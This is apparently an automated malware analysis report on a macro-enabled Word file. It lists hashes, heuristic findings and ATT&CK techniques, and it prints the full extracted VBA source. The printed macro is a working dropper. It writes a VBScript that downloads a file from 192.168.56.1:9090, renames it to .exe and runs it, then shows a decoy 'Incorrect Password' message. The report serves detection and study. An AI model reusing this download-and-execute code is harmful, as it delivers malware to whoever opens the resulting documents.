Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 88a6519f6d745cf7…

MALICIOUS

Office (OOXML)

19.6 KB Created: 2021-10-25 06:02:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-11-02
MD5: 09a11aba2533e8694a3ba5515b2348f9 SHA-1: 0e2ffb5aac9f1a67ed1c0ecdd9f50cfa5b3276b0 SHA-256: 88a6519f6d745cf70e870e39128990567970cb007553dce14942369d30f4fb4b
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer

The sample is an OOXML document containing VBA macros. The macros utilize WScript.Shell and CreateObject to write a VBScript file to disk and then execute it. This script attempts to download a second-stage payload from 'http://192.168.56.1:9090/payload.txt' and save it as an executable file in the temporary directory. The use of Shell() and WScript.Shell indicates a clear intent to execute arbitrary code.

Heuristics 5

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
            Shell "wscript C:\Users\user\AppData\Local\Temp\payload.vbs"
    End Sub
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
            Print #PayLoadFile, "objFSO.MoveFile filepath, exefilepath"
            Print #PayLoadFile, "Set WshShell = WScript.CreateObject(""WScript.Shell"")"
            Print #PayLoadFile, "WshShell.Run exefilepath"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
            Print #PayLoadFile, "Dim TypeLib"
            Print #PayLoadFile, "Set TypeLib = CreateObject(""Scriptlet.TypeLib"")"
            Print #PayLoadFile, "CreateGUID = Mid(TypeLib.GUID, 2, 36)"
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://192.168.56.1:9090/payload.txt In document text (OOXML body / shared strings)
    • https://[MsGraphBaseURL]/[MsGraphVersion]/usersIn document text (OOXML body / shared strings)
    • https://[MsGraphBaseURL]/In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2543 bytes
SHA-256: 295acdf27ae1c6604fd38722e8703f9a9fef8f506ecd0c2b69a2e101ede6a4c0
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub WritePayload()
    Dim PayLoadFile As Integer
    Dim filepath As String
        'FilePath = "C:\temp\payload.vbs"
        filepath = "C:\Users\user\AppData\Local\Temp\payload.vbs"
        PayLoadFile = FreeFile
        Open filepath For Output As #PayLoadFile
        
        Print #PayLoadFile, "HTTPDownload ""http://192.168.56.1:9090/payload.txt"""
        Print #PayLoadFile, "Sub HTTPDownload(myurl)"
        Print #PayLoadFile, "Dim TypeLib"
        Print #PayLoadFile, "Set TypeLib = CreateObject(""Scriptlet.TypeLib"")"
        Print #PayLoadFile, "CreateGUID = Mid(TypeLib.GUID, 2, 36)"
        Print #PayLoadFile, "Dim i, objFile, objFSO, objHTTP, temppath, filepath"
        Print #PayLoadFile, "Const ForReading = 1, ForWriting = 2, ForAppending = 8"
        Print #PayLoadFile, "Const ForWindowsFolder = 0, ForSystemFolder = 1, ForTemporaryFolder = 2"
        Print #PayLoadFile, "Set objFSO = CreateObject(""Scripting.FileSystemObject"")"
        Print #PayLoadFile, "temppath = objFSO.GetSpecialFolder(ForTemporaryFolder)"
        Print #PayLoadFile, "filepath = objFSO.BuildPath(temppath, CreateGUID & "".txt"")"
        Print #PayLoadFile, "exefilepath = objFSO.BuildPath(temppath, CreateGUID & "".exe"")"
        Print #PayLoadFile, "Set objFile = objFSO.OpenTextFile(filepath, ForWriting, True)"
        Print #PayLoadFile, "Set objHTTP = CreateObject(""WinHttp.WinHttpRequest.5.1"")"
        Print #PayLoadFile, "objHTTP.Open ""Get"", myurl, False"
        Print #PayLoadFile, "objHTTP.Send"
        Print #PayLoadFile, "For i = 1 To LenB(objHTTP.ResponseBody)"
        Print #PayLoadFile, "objFile.Write Chr(AscB(MidB(objHTTP.ResponseBody, i, 1)))"
        Print #PayLoadFile, "Next"
        Print #PayLoadFile, "objFile.Close()"
        Print #PayLoadFile, "objFSO.MoveFile filepath, exefilepath"
        Print #PayLoadFile, "Set WshShell = WScript.CreateObject(""WScript.Shell"")"
        Print #PayLoadFile, "WshShell.Run exefilepath"
        Print #PayLoadFile, "End Sub"
        
        Close #PayLoadFile
        
        Shell "wscript C:\Users\user\AppData\Local\Temp\payload.vbs"
End Sub

Sub TestClick()
    WritePayload
    
    MsgBox ("Incorrect Password")
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 10752 bytes
SHA-256: b0c81ffc7ed595177d3c7524db49f9d96cf16baf0a1a4189acb8984e3e9de14f